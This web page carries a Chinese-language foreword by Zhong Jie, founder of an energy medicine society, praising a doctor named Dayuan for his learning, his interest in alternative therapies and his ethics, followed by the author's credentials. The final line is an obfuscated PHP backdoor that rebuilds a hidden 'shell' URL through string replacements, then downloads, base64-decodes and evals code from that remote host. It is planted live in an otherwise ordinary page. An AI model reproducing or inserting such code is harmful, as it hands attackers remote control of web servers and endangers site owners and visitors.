收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

仁心仁術,自然流露

鍾 傑 中華民國能量醫學會創會會長

主流醫學的思維模式沒有限制到他,反而激發他從另類 醫療體系中去尋求到幫助自己、幫助病人的方法。

一位醫生的成長,最好是甚麼病都親自罹患過,這樣他才能深切地去體會各種病人的感受,才更會從病人的立場去思考疾病。大元有幸從小多病,體會多、感受也多,是他成為一位好醫生的機緣。

大元好學,每逢星期三我在台北榮總時的教學門診,他都從斗六搭飛機前來跟診,風雨無阻,使我印象深刻! 聽到那裡有奇異的療法,只要吸引了他,不論國內、國外 都會前往研習,好學不倦。主流醫學的思維模式沒有限制 到他,反而激發他從另類醫療體系中去尋求到幫助自己、 幫助病人的方法,也從他身上隱約地看到一些自己年輕時 的影子。

要成為一位成熟、能受到病人歡迎的醫生,關鍵不在於他的知識有多廣博、和懂得適度放鬆自己、苦中作樂或擅於引經據典說故事;而在於他能否謹守醫生恪言,遵行醫者的職業道德,嚴謹地保護病患隱私。對所有的病人,不論地位高低皆能一視同仁,不自以為醫師是上帝或神 仙,也不裝腔作勢,敢於承認錯誤,不會死要面子,行醫時能多一點「人味」,少一點「藥味」。

從大元診療病患的經驗記述中,不難看到他尊重病患醫療選擇權的做法,仁心仁術,自然流露,樂為之序。



鍾 傑 簡介

‧榮民總醫院針灸科創科主任
‧榮民總醫院傳統醫學研究中心創立主任
‧香港國際專業保健學會會長
‧中華民國能量醫學學創會會長


 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));